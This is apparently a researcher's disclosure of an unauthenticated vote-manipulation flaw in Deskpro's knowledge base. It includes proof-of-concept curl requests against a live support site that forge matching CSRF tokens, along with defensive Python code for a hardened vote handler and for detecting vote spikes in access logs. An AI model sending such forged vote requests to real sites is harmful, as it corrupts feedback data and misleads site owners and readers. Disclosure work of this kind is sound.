Deskpro Knowledge Base Voting Manipulation
CVE-2026-XXXXX - Unauthenticated vote manipulation vulnerability in Deskpro knowledgebase
Paul Hutchinson
Table of contents
- Summary
- Product Information
- Vulnerability Details
- Technical Description
- Proof of Concept
- Video Demonstration
- Impact Assessment
- Business Impact
- CVSS v4.0 Score
- Disclosure Timeline
- Vendor Response
- Recommended Remediation
- Vendor-Side Fixes (Recommended)
- User-Side Mitigations
- CVE Information
- References
- Credits
- Responsible Disclosure
- Disclosure Date: 16 March 2026
- Researcher: Paul Hutchinson, Lexiphanic Ltd
- Severity: MEDIUM (CVSS v4.0: 4.3)
- Status: Disclosed - Vendor does not consider this a security vulnerability
Summary
The Deskpro knowledge base voting system allows unauthenticated manipulation of article votes due to missing request validation, authentication requirements, and rate limiting. This enables any party to artificially inflate or reduce article vote counts, compromising data integrity and feedback metrics across all exposed Deskpro instances.
Product Information
- Vendor: Deskpro
- Product: Deskpro Product (core platform / knowledge base component)
- Affected Versions: All versions with public knowledge base enabled
- Affected Platform: Deskpro installations accessible to unauthenticated users (including deskpro/deskpro-product Docker images)
- Component: Knowledge Base article voting endpoints (vote-up, vote-down)
Vulnerability Details
Technical Description
The voting mechanism for knowledge base articles lacks fundamental security controls. The vote-up and vote-down endpoints accept unauthenticated POST requests without:
- Authentication or session validation
- User identity verification
- Rate limiting or throttling
- CSRF token validation
- CAPTCHA or anti-automation controls
This allows unlimited, automated manipulation of vote counts from any source.
Proof of Concept
The following requests can be executed repeatedly without restriction:
```shell
# _dp_csrf_token can be any value: the cookie and the form field only have to match each other.
# vote-down request
curl 'https://support.deskpro.com/en-US/kb/articles/overview-of-ticketing-interface/vote-down' \
  -H 'content-type: application/x-www-form-urlencoded' \
  -b '_dp_csrf_token=h2isn2f21hj2ugrqfv5k;' \
  --data-raw '_dp_csrf_token=h2isn2f21hj2ugrqfv5k'

# vote-up request
curl 'https://support.deskpro.com/en-US/kb/articles/overview-of-ticketing-interface/vote-up' \
  -H 'content-type: application/x-www-form-urlencoded' \
  -b '_dp_csrf_token=h2isn2f21hj2ugrqfv5k;' \
  --data-raw '_dp_csrf_token=h2isn2f21hj2ugrqfv5k'
```
Each invocation immediately affects the stored vote count with no validation or throttling.
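The requests above work because the only "check" is that a cookie and a form field the same client sets agree with each other. The following Python model is an added illustration written for this advisory, not Deskpro code: it contrasts that weak double-submit comparison with a handler that binds the CSRF token to a server-side session, throttles per client IP, and records one vote per session per article (changing a vote rather than adding to it). The `VoteService` class, its method names, the session ids and the 5-votes-per-hour limit are assumptions for the example.

```python
"""Hardened knowledge-base vote handler (added illustration, not Deskpro's code).

Models the controls the advisory lists as missing: CSRF tokens bound to a
server-side session, per-IP rate limiting and one recorded vote per session
per article. Class and method names, session ids, article slugs and the
default limit of 5 votes per hour are constructed values for this example.
"""
import hmac
import secrets
import time
from collections import defaultdict, deque


def weak_csrf_check(cookie_token, body_token):
    """The pattern the curl PoC defeats: comparing a cookie the client sets
    against a body field the same client sets proves nothing, because the
    sender controls both values."""
    return cookie_token == body_token


class VoteService:
    def __init__(self, votes_per_hour=5, window_seconds=3600):
        self.sessions = {}                    # session_id -> server-issued CSRF token
        self.counts = defaultdict(lambda: {"up": 0, "down": 0})  # article -> tallies
        self.recorded = {}                    # (session_id, article) -> last direction
        self.ip_hits = defaultdict(deque)     # client_ip -> timestamps of recent votes
        self.limit = votes_per_hour
        self.window = window_seconds

    def new_session(self):
        """Issue a session id and a CSRF token that only the server knows to expect."""
        sid = secrets.token_urlsafe(16)
        token = secrets.token_urlsafe(32)
        self.sessions[sid] = token
        return sid, token

    def _csrf_ok(self, session_id, token):
        # The token must match what the server issued for this session, so a
        # client cannot satisfy the check by inventing a matching pair.
        expected = self.sessions.get(session_id)
        return expected is not None and hmac.compare_digest(expected, token)

    def _rate_ok(self, client_ip, now):
        # Sliding window: drop hits older than the window, then compare the count.
        hits = self.ip_hits[client_ip]
        while hits and now - hits[0] > self.window:
            hits.popleft()
        if len(hits) >= self.limit:
            return False
        hits.append(now)
        return True

    def vote(self, session_id, csrf_token, client_ip, article, direction, now=None):
        """Return 'ok', 'bad_request', 'forbidden', 'rate_limited' or 'duplicate'."""
        now = time.time() if now is None else now
        if direction not in ("up", "down"):
            return "bad_request"
        if not self._csrf_ok(session_id, csrf_token):
            return "forbidden"
        if not self._rate_ok(client_ip, now):
            return "rate_limited"
        key = (session_id, article)
        previous = self.recorded.get(key)
        if previous == direction:
            return "duplicate"            # same vote again: no change to the tally
        if previous is not None:
            self.counts[article][previous] -= 1   # the session changed its mind
        self.counts[article][direction] += 1
        self.recorded[key] = direction
        return "ok"


if __name__ == "__main__":
    svc = VoteService(votes_per_hour=3)
    sid, tok = svc.new_session()
    print(svc.vote("no-such-session", "h2isn2f21hj2ugrqfv5k", "203.0.113.5", "article-a", "up"))
    print(svc.vote(sid, tok, "203.0.113.5", "article-a", "up"))
    print(svc.vote(sid, tok, "203.0.113.5", "article-a", "up"))
    print(dict(svc.counts))
```

The rate limiter counts every attempted vote, including duplicates and vote changes, so a single session cannot burn through the budget by flipping a vote repeatedly; a production deployment would persist `sessions`, `recorded` and `ip_hits` in shared storage rather than process memory.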
Video Demonstration
Impact Assessment
Business Impact
- Article Credibility: Vote counts can be manipulated to mislead users about content quality
- Ranking Manipulation: Article visibility and search ranking can be artificially altered
- Reputation Attack: Targeted downvoting campaigns against specific documentation
- Analytics Corruption: Inflated or deflated metrics affect reporting and internal decisions
- Social Engineering: Malicious articles could be artificially promoted for phishing campaigns
CVSS v4.0 Score
Score: 4.3 (MEDIUM)
Vector: AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
- Attack Vector (AV:N): Network - remotely exploitable
- Attack Complexity (AC:L): Low - no special conditions required
- Attack Requirements (AT:N): None
- Privileges Required (PR:N): None - unauthenticated
- User Interaction (UI:N): None required
- Vulnerable System Confidentiality (VC:L): Low - vote metrics exposed
- Vulnerable System Integrity (VI:L): Low - data integrity compromised
- Vulnerable System Availability (VA:N): None
This represents a data integrity vulnerability rather than direct security access or data exposure.
Disclosure Timeline
| Date | Event |
|---|---|
| 6 March 2026 | Initial vulnerability report submitted to Deskpro Security Team |
| 10 March 2026 | Vendor response received - classified as product behaviour, not a security issue |
| 10 March 2026 | Follow-up sent noting intent to request CVE for transparency and tracking |
| 16 March 2026 | CVE request submitted to MITRE CNA of Last Resort |
| 16 June 2026 | Public disclosure |
Vendor Response
Deskpro's security team reviewed the report and responded that the knowledge base voting functionality is intentionally available to unauthenticated users to enable quick visitor feedback. They classified this as product behaviour rather than a security vulnerability.
The vendor indicated they would pass feedback to the relevant team for consideration of future improvements, such as additional abuse protections.
Despite the vendor's position, we proceeded with a CVE request to ensure transparent tracking across installations, as the absence of validation controls represents a data integrity issue that could have reputational and operational impact on public deployments.
The vendor did not provide any further response or a vendor statement after the follow-up.
Recommended Remediation
Organizations using Deskpro with public knowledge bases should consider the following mitigations:
Vendor-Side Fixes (Recommended)
- Implement authentication requirement - Tie voting actions to authenticated user sessions
- Server-side rate limiting - Apply per-user or per-IP throttling (e.g., 5 votes per hour)
- CSRF protection - Add token validation to voting endpoints
- CAPTCHA integration - Prevent automated abuse with human verification
- IP fingerprinting - Track and limit votes from single sources
- Cookie-based vote tracking - Use persistent identifiers to prevent duplicate votes
User-Side Mitigations
Until vendor fixes are available:
- Monitor vote analytics for unusual patterns or spikes
- Disable public voting if data integrity is critical
- Implement web application firewall (WAF) rules to rate-limit voting endpoints
- Use reverse proxy rate limiting as temporary protection
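The first mitigation above, monitoring for unusual patterns, can be done from reverse-proxy access logs without any change to Deskpro itself. The script below is an added example for this advisory, not a Deskpro or Lexiphanic tool: it parses combined-format (Nginx/Apache style) access-log lines, keeps only POSTs to the `/kb/articles/<slug>/vote-up` and `/vote-down` paths, and flags client IPs that exceed a threshold of votes within a sliding window. The log lines are constructed sample data using addresses from the 203.0.113.0/24 documentation range; the threshold and window values are assumptions.

```python
"""Vote-endpoint spike detection from access logs (added example, not Deskpro code).

Parses combined-format access-log lines, extracts POSTs to the knowledge-base
vote endpoints and reports client IPs that cast more than `threshold` votes
within any `window` of seconds. SAMPLE_LOG is constructed data.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Combined log format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Matches the vote endpoints from the advisory, with any locale prefix such as /en-US
VOTE_RE = re.compile(r"^/[^?]*/kb/articles/(?P<slug>[^/]+)/vote-(?P<dir>up|down)$")

# Constructed sample: one client fires six down-votes in five seconds, another
# reads the article and votes once three minutes later.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Mar/2026:10:00:00 +0000] "POST /en-US/kb/articles/overview-of-ticketing-interface/vote-down HTTP/1.1" 200 12
203.0.113.5 - - [16/Mar/2026:10:00:01 +0000] "POST /en-US/kb/articles/overview-of-ticketing-interface/vote-down HTTP/1.1" 200 12
203.0.113.5 - - [16/Mar/2026:10:00:02 +0000] "POST /en-US/kb/articles/overview-of-ticketing-interface/vote-down HTTP/1.1" 200 12
203.0.113.5 - - [16/Mar/2026:10:00:03 +0000] "POST /en-US/kb/articles/overview-of-ticketing-interface/vote-down HTTP/1.1" 200 12
203.0.113.5 - - [16/Mar/2026:10:00:04 +0000] "POST /en-US/kb/articles/overview-of-ticketing-interface/vote-down HTTP/1.1" 200 12
203.0.113.5 - - [16/Mar/2026:10:00:05 +0000] "POST /en-US/kb/articles/overview-of-ticketing-interface/vote-down HTTP/1.1" 200 12
203.0.113.9 - - [16/Mar/2026:10:00:05 +0000] "GET /en-US/kb/articles/overview-of-ticketing-interface HTTP/1.1" 200 8412
203.0.113.9 - - [16/Mar/2026:10:03:00 +0000] "POST /en-US/kb/articles/overview-of-ticketing-interface/vote-up HTTP/1.1" 200 12
"""


def parse_vote_events(log_text):
    """Return a list of (ip, epoch_seconds, slug, direction) for vote POSTs."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("method") != "POST":
            continue
        v = VOTE_RE.match(m.group("path"))
        if not v:
            continue
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z").timestamp()
        events.append((m.group("ip"), ts, v.group("slug"), v.group("dir")))
    return events


def find_vote_spikes(events, threshold=5, window=60):
    """Return {ip: peak_votes_in_window} for IPs exceeding the threshold."""
    by_ip = defaultdict(deque)
    peaks = {}
    for ip, ts, _slug, _direction in sorted(events, key=lambda e: e[1]):
        recent = by_ip[ip]
        recent.append(ts)
        while recent and ts - recent[0] > window:   # slide the window forward
            recent.popleft()
        if len(recent) > threshold:
            peaks[ip] = max(peaks.get(ip, 0), len(recent))
    return peaks


if __name__ == "__main__":
    for ip, peak in find_vote_spikes(parse_vote_events(SAMPLE_LOG)).items():
        print(f"{ip}: {peak} votes within 60s, exceeds threshold")
```

Feeding real logs in through `parse_vote_events` and alerting on a non-empty result from `find_vote_spikes` gives a cheap detection for the bulk voting the PoC demonstrates; the same per-IP window is what a WAF or `limit_req`-style reverse-proxy rule enforces at request time.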
CVE Information
- CVE ID: CVE-2026-XXXXX (pending assignment)
- CNA: MITRE CNA of Last Resort
- Classification: Data Integrity / Functional Abuse
References
- Deskpro Official Site
- Deskpro Support Ticket
- Deskpro Docker Image
- CVSS v4.0 Calculator
- MITRE CVE Program
Credits
- Researcher: Paul Hutchinson
- Organization: Lexiphanic Ltd
- Contact: paul@lexiphanic.co.uk
- GitHub: happypaul55
Responsible Disclosure
This vulnerability was responsibly disclosed to the vendor in accordance with coordinated disclosure practices. The vendor was offered a 90-day window to investigate, remediate, and provide a statement for coordinated disclosure.
Following their review, the vendor classified the issue as "product as designed" and did not consider it a security vulnerability. As no remediation was planned, public disclosure proceeded after notifying the vendor and submitting a CVE request for transparency and tracking purposes.
This research was conducted as part of Lexiphanic Ltd's ongoing security research program. If you have questions about this disclosure or would like to report a security issue, please contact paul@lexiphanic.co.uk.